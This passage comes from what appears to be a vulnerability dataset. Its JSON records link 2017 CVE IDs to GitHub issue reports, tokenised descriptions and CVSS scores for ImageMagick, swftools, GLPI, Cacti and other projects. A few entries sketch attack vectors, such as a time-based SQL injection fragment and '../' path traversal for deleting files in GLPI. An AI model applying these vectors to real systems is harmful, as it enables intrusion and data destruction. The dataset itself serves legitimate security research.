  5671. "CVE_ID": "CVE-2017-10929",
  5672. "Issue_Url_old": "https://github.com/radare/radare2/issues/7855",
  5673. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7855",
  5674. "Repo_new": "radareorg/radare2",
  5675. "Issue_Created_At": "2017-07-03T18:50:01Z",
  5676. "description": "Heap buffer overflow in APITAG Heap buffer overflow in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  5677. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5678. "severity": "HIGH",
  5679. "baseScore": 7.8,
  5680. "impactScore": 5.9,
  5681. "exploitabilityScore": 1.8
  5682. },
  5683. {
  5684. "CVE_ID": "CVE-2017-10970",
  5685. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/838",
  5686. "Issue_Url_new": "https://github.com/cacti/cacti/issues/838",
  5687. "Repo_new": "cacti/cacti",
  5688. "Issue_Created_At": "2017-07-05T09:05:12Z",
  5689. "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote anonymous users to inject arbitrary web script or HTML via the id parameter. eg: APITAG FILETAG",
  5690. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
  5691. "severity": "MEDIUM",
  5692. "baseScore": 5.4,
  5693. "impactScore": 2.5,
  5694. "exploitabilityScore": 2.8
  5695. },
  5696. {
  5697. "CVE_ID": "CVE-2017-10976",
  5698. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/28",
  5699. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/28",
  5700. "Repo_new": "matthiaskramm/swftools",
  5701. "Issue_Created_At": "2017-06-11T14:12:37Z",
  5702. "description": "ttftool APITAG memcpy overflow. Crash : URLTAG url Trigger : ./ttftool swftools/ttf2swf_crash_memcpy Crash Detail : ERRORTAG",
  5703. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5704. "severity": "HIGH",
  5705. "baseScore": 7.5,
  5706. "impactScore": 3.6,
  5707. "exploitabilityScore": 3.9
  5708. },
  5709. {
  5710. "CVE_ID": "CVE-2017-10995",
  5711. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/538",
  5712. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/538",
  5713. "Repo_new": "imagemagick/imagemagick",
  5714. "Issue_Created_At": "2017-07-04T16:32:12Z",
  5715. "description": "imagemagick identify&convert heap buffer overflow . APITAG NUMBERTAG APITAG build instructions: APITAG when identify or convert MNG file, imagemagick will cause a heap buffer overflow > APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c5a at pc NUMBERTAG fee NUMBERTAG dfb7d bp NUMBERTAG ffeba NUMBERTAG b0 sp NUMBERTAG ffeba NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG c5a thread T NUMBERTAG fee NUMBERTAG dfb7c in mng_get_long APITAG NUMBERTAG fee NUMBERTAG f NUMBERTAG ad in APITAG APITAG NUMBERTAG fee NUMBERTAG fae NUMBERTAG in APITAG APITAG NUMBERTAG fee NUMBERTAG c4f in APITAG APITAG NUMBERTAG fee NUMBERTAG bee NUMBERTAG in APITAG APITAG NUMBERTAG fee NUMBERTAG c in APITAG APITAG NUMBERTAG fee NUMBERTAG a9 in APITAG APITAG NUMBERTAG fee NUMBERTAG c NUMBERTAG a2a in APITAG APITAG NUMBERTAG fee NUMBERTAG c NUMBERTAG c7a in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG be in main APITAG NUMBERTAG fee NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) The vulnerability is caused when identify MNG image, which happens in function mng_get_long APITAG which is called by line NUMBERTAG at coders/png.c. Here is the critical code of mng_get_long and its call code: ERRORTAG CODETAG It is caused by heap buffer overflow, which is caused by a read operation without overflow check. The p buffer is pointer to chunk, its buffer data and length are read from input file, ERRORTAG When setting proper length and repeat value, it is possible to disclosing some critical data, such as heap chunk data and even other applications\u2019 private data. Testcase: URLTAG",
  5716. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5717. "severity": "MEDIUM",
  5718. "baseScore": 5.5,
  5719. "impactScore": 3.6,
  5720. "exploitabilityScore": 1.8
  5721. },
  5722. {
  5723. "CVE_ID": "CVE-2017-11096",
  5724. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/25",
  5725. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/25",
  5726. "Repo_new": "matthiaskramm/swftools",
  5727. "Issue_Created_At": "2017-06-11T14:06:28Z",
  5728. "description": "swfcombine APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfcombine t m G B v z f o /dev/null swftools/swfcombine_ t m G B v z f APITAG Crash Detail : ERRORTAG",
  5729. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5730. "severity": "HIGH",
  5731. "baseScore": 8.8,
  5732. "impactScore": 5.9,
  5733. "exploitabilityScore": 2.8
  5734. },
  5735. {
  5736. "CVE_ID": "CVE-2017-11097",
  5737. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/24",
  5738. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/24",
  5739. "Repo_new": "matthiaskramm/swftools",
  5740. "Issue_Created_At": "2017-06-11T14:03:58Z",
  5741. "description": "swfc APITAG Null pointer access . Crash : URLTAG url Trigger : ./swfc APITAG Crash Detail : ERRORTAG",
  5742. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5743. "severity": "HIGH",
  5744. "baseScore": 8.8,
  5745. "impactScore": 5.9,
  5746. "exploitabilityScore": 2.8
  5747. },
  5748. {
  5749. "CVE_ID": "CVE-2017-11098",
  5750. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/32",
  5751. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/32",
  5752. "Repo_new": "matthiaskramm/swftools",
  5753. "Issue_Created_At": "2017-06-11T14:21:21Z",
  5754. "description": "png2swf APITAG access except. Crash : URLTAG url Trigger : ./png2swf r z j NUMBERTAG s NUMBERTAG o /dev/null swftools/png2swf_ r_ z_ j NUMBERTAG s NUMBERTAG APITAG Crash Detail : PATHTAG ./png2swf r z j NUMBERTAG s NUMBERTAG o /dev/null swftools/png2swf_ r_ z_ j NUMBERTAG s NUMBERTAG APITAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG fb5e1f NUMBERTAG pc NUMBERTAG a8a bp NUMBERTAG fffffff0 sp NUMBERTAG ffe7e1c NUMBERTAG e0 T NUMBERTAG a NUMBERTAG in png_load ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG in main ( PATHTAG ERRORTAG NUMBERTAG fb5e4dfb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG png_load NUMBERTAG ABORTING",
  5755. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5756. "severity": "HIGH",
  5757. "baseScore": 8.8,
  5758. "impactScore": 5.9,
  5759. "exploitabilityScore": 2.8
  5760. },
  5761. {
  5762. "CVE_ID": "CVE-2017-11099",
  5763. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/31",
  5764. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/31",
  5765. "Repo_new": "matthiaskramm/swftools",
  5766. "Issue_Created_At": "2017-06-11T14:19:07Z",
  5767. "description": "wa NUMBERTAG swf APITAG access except . Crash : URLTAG url Trigger : ./wa NUMBERTAG swf APITAG Crash Detail : PATHTAG ./wa NUMBERTAG swf APITAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG ffe0eb NUMBERTAG sp NUMBERTAG ffe0eb NUMBERTAG f NUMBERTAG T NUMBERTAG in wav_convert2mono ( PATHTAG NUMBERTAG a in main ( PATHTAG NUMBERTAG fccd NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG wav_convert2mono NUMBERTAG ABORTING",
  5768. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5769. "severity": "HIGH",
  5770. "baseScore": 8.8,
  5771. "impactScore": 5.9,
  5772. "exploitabilityScore": 2.8
  5773. },
  5774. {
  5775. "CVE_ID": "CVE-2017-11100",
  5776. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/27",
  5777. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/27",
  5778. "Repo_new": "matthiaskramm/swftools",
  5779. "Issue_Created_At": "2017-06-11T14:09:51Z",
  5780. "description": "swfextract APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfextract APITAG Crash Detail : ERRORTAG",
  5781. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5782. "severity": "HIGH",
  5783. "baseScore": 8.8,
  5784. "impactScore": 5.9,
  5785. "exploitabilityScore": 2.8
  5786. },
  5787. {
  5788. "CVE_ID": "CVE-2017-11101",
  5789. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/26",
  5790. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/26",
  5791. "Repo_new": "matthiaskramm/swftools",
  5792. "Issue_Created_At": "2017-06-11T14:07:57Z",
  5793. "description": "swfcombine APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfcombine t m G B v z f o /dev/null swftools/swfcombine_ t m G B v z f APITAG Crash Detail : ERRORTAG",
  5794. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5795. "severity": "HIGH",
  5796. "baseScore": 8.8,
  5797. "impactScore": 5.9,
  5798. "exploitabilityScore": 2.8
  5799. },
  5800. {
  5801. "CVE_ID": "CVE-2017-11107",
  5802. "Issue_Url_old": "https://github.com/leenooks/phpLDAPadmin/issues/50",
  5803. "Issue_Url_new": "https://github.com/leenooks/phpldapadmin/issues/50",
  5804. "Repo_new": "leenooks/phpldapadmin",
  5805. "Issue_Created_At": "2017-07-08T02:02:33Z",
  5806. "description": "XSS in FILETAG . Hello, Ismail Belkacim reported CVETAG to Ubuntu's bug tracker. He also provided a patch, URLTAG is this an already known issue? Do you know if CVE has already been assigned to this issue? I didn't see fixes like his in the git tree here. Thanks The important part of the patch: ERRORTAG",
  5807. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5808. "severity": "MEDIUM",
  5809. "baseScore": 6.1,
  5810. "impactScore": 2.7,
  5811. "exploitabilityScore": 2.8
  5812. },
  5813. {
  5814. "CVE_ID": "CVE-2017-11141",
  5815. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/469",
  5816. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/469",
  5817. "Repo_new": "imagemagick/imagemagick",
  5818. "Issue_Created_At": "2017-05-04T03:33:33Z",
  5819. "description": "memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identifying a MAT file, imagemagick will allocate memory to store data in function APITAG in coders\\mat.c, line NUMBERTAG PATHTAG APITAG PATHTAG APITAG will call function APITAG in APITAG line NUMBERTAG PATHTAG APITAG >depth); PATHTAG APITAG will call function APITAG in APITAG line NUMBERTAG PATHTAG APITAG { ... APITAG >columns,image >rows) quantum; // line NUMBERTAG can be controlled ... APITAG //line NUMBERTAG PATHTAG image >columns and image >rows can be controlled, as it is assigned in APITAG NUMBERTAG PATHTAG image >columns = APITAG // can be controlled image >rows = APITAG // can be controlled PATHTAG MATLAB_HDR are directly from MAT file without checking in APITAG NUMBERTAG PATHTAG if APITAG char ) APITAG NUMBERTAG can be controlled by modifying the MAT file PATHTAG So, modifying the width and height can cause APITAG to allocate an arbitrarily sized amount of memory, which may cause memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
  5820. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5821. "severity": "MEDIUM",
  5822. "baseScore": 6.5,
  5823. "impactScore": 3.6,
  5824. "exploitabilityScore": 2.8
  5825. },
  5826. {
  5827. "CVE_ID": "CVE-2017-11163",
  5828. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/847",
  5829. "Issue_Url_new": "https://github.com/cacti/cacti/issues/847",
  5830. "Repo_new": "cacti/cacti",
  5831. "Issue_Created_At": "2017-07-10T06:45:04Z",
  5832. "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG iaotian. EMAILTAG .cn APITAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote authenticated users to inject arbitrary web script or HTML via specially crafted HTTP Referer headers. APITAG APITAG APITAG",
  5833. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5834. "severity": "MEDIUM",
  5835. "baseScore": 5.4,
  5836. "impactScore": 2.7,
  5837. "exploitabilityScore": 2.3
  5838. },
  5839. {
  5840. "CVE_ID": "CVE-2017-11166",
  5841. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/471",
  5842. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/471",
  5843. "Repo_new": "imagemagick/imagemagick",
  5844. "Issue_Created_At": "2017-05-04T03:37:12Z",
  5845. "description": "submitted memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identifying an XWD file, imagemagick will allocate memory to store pixels in function APITAG in coders\\xwd.c, line NUMBERTAG PATHTAG APITAG ) APITAG colors)); // can be controlled PATHTAG length can be controlled, as it is assigned as follows (line NUMBERTAG PATHTAG length=(size_t) APITAG PATHTAG APITAG are directly from XWD file without checking (line NUMBERTAG PATHTAG APITAG char ) &header); // can be controlled by modifying the XWD file PATHTAG header is an instance of struct _xwd_file_header as follows: PATHTAG typedef struct _xwd_file_header { / header_size = APITAG + length of null terminated window name. / CARD NUMBERTAG header_size B NUMBERTAG CARD NUMBERTAG file_version B NUMBERTAG WD_FILE_VERSION above / CARD NUMBERTAG pixmap_format B NUMBERTAG APITAG or APITAG / CARD NUMBERTAG pixmap_depth B NUMBERTAG Pixmap depth / CARD NUMBERTAG pixmap_width B NUMBERTAG Pixmap width / CARD NUMBERTAG pixmap_height B NUMBERTAG Pixmap height / CARD NUMBERTAG offset B NUMBERTAG Bitmap x offset, normally NUMBERTAG CARD NUMBERTAG byte_order B NUMBERTAG of image data: APITAG APITAG / / bitmap_unit applies to bitmaps (depth NUMBERTAG format XY) only. It is the number of bits that each scanline is padded to. / CARD NUMBERTAG bitmap_unit B NUMBERTAG CARD NUMBERTAG bitmap_bit_order B NUMBERTAG bitmaps only: APITAG APITAG / / bitmap_pad applies to pixmaps (non bitmaps) only. It is the number of bits that each scanline is padded to. / CARD NUMBERTAG bitmap_pad B NUMBERTAG CARD NUMBERTAG bits_per_pixel B NUMBERTAG Bits per pixel / / bytes_per_line is pixmap_width padded to bitmap_unit (bitmaps) or bitmap_pad (pixmaps). It is the delta (in bytes) to get to the same x position on an adjacent row. / CARD NUMBERTAG bytes_per_line B NUMBERTAG CARD NUMBERTAG isual_class B NUMBERTAG Class of colormap / CARD NUMBERTAG red_mask B NUMBERTAG Z red mask / CARD NUMBERTAG green_mask B NUMBERTAG Z green mask / CARD NUMBERTAG blue_mask B NUMBERTAG Z blue mask / CARD NUMBERTAG bits_per_rgb B NUMBERTAG Log2 of distinct color values / CARD NUMBERTAG colormap_entries B NUMBERTAG Number of entries in colormap; not used? / CARD NUMBERTAG ncolors B NUMBERTAG Number of APITAG structures / CARD NUMBERTAG window_width B NUMBERTAG Window width / CARD NUMBERTAG window_height B NUMBERTAG Window height / CARD NUMBERTAG window_x B NUMBERTAG Window upper left X coordinate / CARD NUMBERTAG window_y B NUMBERTAG Window upper left Y coordinate / CARD NUMBERTAG window_bdrwidth B NUMBERTAG Window border width / } APITAG PATHTAG So, modifying the ncolors can cause APITAG to allocate an arbitrarily sized amount of memory, which may cause memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
  5846. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5847. "severity": "MEDIUM",
  5848. "baseScore": 6.5,
  5849. "impactScore": 3.6,
  5850. "exploitabilityScore": 2.8
  5851. },
  5852. {
  5853. "CVE_ID": "CVE-2017-11170",
  5854. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/472",
  5855. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/472",
  5856. "Repo_new": "imagemagick/imagemagick",
  5857. "Issue_Created_At": "2017-05-04T06:35:56Z",
  5858. "description": "memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identifying a VST file, imagemagick will allocate memory to store data in function APITAG in coders ga.c (line NUMBERTAG PATHTAG if (image >storage_class == APITAG // line NUMBERTAG can be controlled { ... size_t one; // line NUMBERTAG one NUMBERTAG line NUMBERTAG image >colors=one APITAG colors,exception) == APITAG // line NUMBERTAG PATHTAG APITAG is directly from VST file without checking in tga.c (line NUMBERTAG PATHTAG APITAG char) APITAG // can be controlled by modifying the VST file PATHTAG By reviewing the function code, APITAG max valid value is NUMBERTAG On NUMBERTAG bit os, size_t one will be NUMBERTAG bit, so image >colors can overflow to NUMBERTAG On NUMBERTAG bit os, size_t one will be NUMBERTAG bit, so image >colors can be as large as NUMBERTAG GB). Normally, this will not cause a problem because image >storage_class is equal APITAG But image >storage_class can also be controlled; it is assigned as follows PATHTAG if APITAG == APITAG || APITAG == APITAG || APITAG == APITAG || APITAG == APITAG // image_type can be controlled image APITAG PATHTAG image_type is directly from VST file PATHTAG APITAG APITAG PATHTAG Memory allocation happens earlier than the security check PATHTAG APITAG >columns,image >rows,exception); // line NUMBERTAG PATHTAG So, modifying the image_type and bits_per_pixel can cause APITAG to allocate an arbitrarily sized amount of memory, which may cause memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
  5859. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5860. "severity": "HIGH",
  5861. "baseScore": 8.8,
  5862. "impactScore": 5.9,
  5863. "exploitabilityScore": 2.8
  5864. },
  5865. {
  5866. "CVE_ID": "CVE-2017-11183",
  5867. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2450",
  5868. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2450",
  5869. "Repo_new": "glpi-project/glpi",
  5870. "Issue_Created_At": "2017-07-12T04:45:10Z",
  5871. "description": "Arbitrary file deletion in FILETAG . CVETAG APITAG Vectors] To exploit the vulnerability, someone must log in with an admin account and request URLTAG; the \"file\" value can route to any file with ../ and it can delete any file on the server",
  5872. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  5873. "severity": "MEDIUM",
  5874. "baseScore": 4.9,
  5875. "impactScore": 3.6,
  5876. "exploitabilityScore": 1.2
  5877. },
  5878. {
  5879. "CVE_ID": "CVE-2017-11184",
  5880. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2449",
  5881. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2449",
  5882. "Repo_new": "glpi-project/glpi",
  5883. "Issue_Created_At": "2017-07-12T04:40:25Z",
  5884. "description": "SQL injection in FILETAG . CVETAG APITAG Vectors] to exploit vulnerability ,someone must login with a admin accounts, and request URLTAG and the \"start\" has sql injection whit poc NUMBERTAG PROCEDURE analyse((select APITAG > if NUMBERTAG true) the response will get after NUMBERTAG s , if NUMBERTAG false) the response will get right now",
  5885. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5886. "severity": "CRITICAL",
  5887. "baseScore": 9.8,
  5888. "impactScore": 5.9,
  5889. "exploitabilityScore": 3.9
  5890. },
  5891. {
  5892. "CVE_ID": "CVE-2017-11188",
  5893. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/509",
  5894. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/509",
  5895. "Repo_new": "imagemagick/imagemagick",
  5896. "Issue_Created_At": "2017-06-08T12:27:43Z",
  5897. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE ''' APITAG '''",
  5898. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5899. "severity": "HIGH",
  5900. "baseScore": 7.5,
  5901. "impactScore": 3.6,
  5902. "exploitabilityScore": 3.9
  5903. },
  5904. {
  5905. "CVE_ID": "CVE-2017-11310",
  5906. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/517",
  5907. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/517",
  5908. "Repo_new": "imagemagick/imagemagick",
  5909. "Issue_Created_At": "2017-06-22T03:21:28Z",
  5910. "description": "memory leak in read_user_chunk_callback in png.c. Version: APITAG NUMBERTAG Q NUMBERTAG The read_user_chunk_callback function in png.c allows attackers to cause a denial of service (memory leak) via a small crafted png file. ERRORTAG testcase CODETAG Credit: APITAG of Venustech",
  5911. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5912. "severity": "HIGH",
  5913. "baseScore": 8.8,
  5914. "impactScore": 5.9,
  5915. "exploitabilityScore": 2.8
  5916. },
  5917. {
  5918. "CVE_ID": "CVE-2017-11329",
  5919. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2456",
  5920. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2456",
  5921. "Repo_new": "glpi-project/glpi",
  5922. "Issue_Created_At": "2017-07-12T14:16:12Z",
  5923. "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have send the detail of vulnerability to your email. Please check.",
  5924. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5925. "severity": "CRITICAL",
  5926. "baseScore": 9.8,
  5927. "impactScore": 5.9,
  5928. "exploitabilityScore": 3.9
  5929. },
  5930. {
  5931. "CVE_ID": "CVE-2017-11348",
  5932. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3654",
  5933. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3654",
  5934. "Repo_new": "octopusdeploy/issues",
  5935. "Issue_Created_At": "2017-07-11T02:42:59Z",
  5936. "description": "Validate APITAG in uploaded packages. source: URLTAG",
  5937. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  5938. "severity": "MEDIUM",
  5939. "baseScore": 5.7,
  5940. "impactScore": 3.6,
  5941. "exploitabilityScore": 2.1
  5942. },
  5943. {
  5944. "CVE_ID": "CVE-2017-11352",
  5945. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/502",
  5946. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/502",
  5947. "Repo_new": "imagemagick/imagemagick",
  5948. "Issue_Created_At": "2017-05-31T08:24:16Z",
  5949. "description": "rle.c: operand/opcode variables copy & paste confusion in latest commit. Talking about NUMBERTAG fdf9ea commit.",
  5950. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5951. "severity": "MEDIUM",
  5952. "baseScore": 6.5,
  5953. "impactScore": 3.6,
  5954. "exploitabilityScore": 2.8
  5955. },
  5956. {
  5957. "CVE_ID": "CVE-2017-11353",
  5958. "Issue_Url_old": "https://github.com/TheLocehiliosan/yadm/issues/74",
  5959. "Issue_Url_new": "https://github.com/thelocehiliosan/yadm/issues/74",
  5960. "Repo_new": "thelocehiliosan/yadm",
  5961. "Issue_Created_At": "2017-07-14T16:26:00Z",
  5962. "description": "Create private .ssh and .gnupg directories prior to merge (during clone). As referenced in Debian NUMBERTAG CVETAG , permissions on APITAG and APITAG directories are restricted _after_ an initial clone is complete. Git employs the user's umask to set permissions for any files/directories created. If APITAG or APITAG directories already exist with restricted permissions prior to cloning, the permissions will not be changed. Git only affects the permissions of directories that do not already exist. In practice this race condition does not pose a problem assuming the encryption feature is used for confidential data. For example, suppose a user wants to manage a APITAG and APITAG . Also suppose the APITAG is limited configuration data only, and the APITAG is their private key. If APITAG is included using the encryption function the following scenarios are possible: If APITAG already exists and is secured During the clone APITAG permissions are not changed (remain secure) If APITAG does not yet exist During the clone APITAG and APITAG will be created with the default umask (at this point no private data is exposed) After the clone permissions are restricted yadm decrypt is run (either by the user or via bootstrap) and the APITAG is put into the APITAG . APITAG 's permissions will already be restricted at this point Regardless, I plan to update clone operations. If there are files under locations APITAG or APITAG and those paths do not yet exist (an initial clone), I will create empty directories and secure them first. This should mitigate any concerns about a race condition. However, I don't think there is any effective problem as it stands today.",
  5963. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  5964. "severity": "MEDIUM",
  5965. "baseScore": 5.9,
  5966. "impactScore": 3.6,
  5967. "exploitabilityScore": 2.2
  5968. },
  5969. {
  5970. "CVE_ID": "CVE-2017-11354",
  5971. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/4",
  5972. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/4",
  5973. "Repo_new": "fiyocms/fiyocms",
  5974. "Issue_Created_At": "2017-07-15T19:34:26Z",
  5975. "description": "SQL Injection in tag add function. There is an SQL injection in the tag adding function; its location is in PATHTAG No filter has been used on the $_POST FILETAG ERRORTAG In the database insert function, there is no filter function either, just a couple of \" added beside the tag name. So when we update a tag name or add a tag name there is always the problem of SQL injection. URL: PATHTAG DATA: APITAG We need an account to do this. Discovered by: Chaitin Technology",
  5976. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5977. "severity": "CRITICAL",
  5978. "baseScore": 9.8,
  5979. "impactScore": 5.9,
  5980. "exploitabilityScore": 3.9
  5981. },
  5982. {
  5983. "CVE_ID": "CVE-2017-11360",
  5984. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/518",
  5985. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/518",
  5986. "Repo_new": "imagemagick/imagemagick",
  5987. "Issue_Created_At": "2017-06-22T15:26:04Z",
  5988. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE ERRORTAG APITAG APITAG APITAG Because the loop count can be controlled, so it can cause APITAG spend a lot of time to process a crafted imagefile, even if the imagefile is very small. Credit: APITAG of Venustech",
  5989. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5990. "severity": "MEDIUM",
  5991. "baseScore": 6.5,
  5992. "impactScore": 3.6,
  5993. "exploitabilityScore": 2.8
  5994. },
  5995. {
  5996. "CVE_ID": "CVE-2017-11366",
  5997. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1011",
  5998. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1011",
  5999. "Repo_new": "codiad/codiad",
  6000. "Issue_Created_At": "2017-07-25T06:41:00Z",
  6001. "description": "Security issues, Remote Code Execution Vulnerability. Hacker can get APITAG server privileges by the vulnerability, I have sent you an email about that, but did not receive a reply. For more details, please contact my mailbox",
  6002. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6003. "severity": "CRITICAL",
  6004. "baseScore": 9.8,
  6005. "impactScore": 5.9,
  6006. "exploitabilityScore": 3.9
  6007. },
  6008. {
  6009. "CVE_ID": "CVE-2017-11367",
  6010. "Issue_Url_old": "https://github.com/Ed-von-Schleck/shoco/issues/28",
  6011. "Issue_Url_new": "https://github.com/ed-von-schleck/shoco/issues/28",
  6012. "Repo_new": "ed-von-schleck/shoco",
  6013. "Issue_Created_At": "2017-02-22T01:13:49Z",
  6014. "description": "global buffer overflow in APITAG Compiled with AFL with APITAG like APITAG and then run like APITAG which produces this: ERRORTAG FILETAG",
  6015. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  6016. "severity": "HIGH",
  6017. "baseScore": 7.5,
  6018. "impactScore": 3.6,
  6019. "exploitabilityScore": 3.9
  6020. },
  6021. {
  6022. "CVE_ID": "CVE-2017-11412",
  6023. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/5",
  6024. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/5",
  6025. "Repo_new": "fiyocms/fiyocms",
  6026. "Issue_Created_At": "2017-07-17T05:49:21Z",
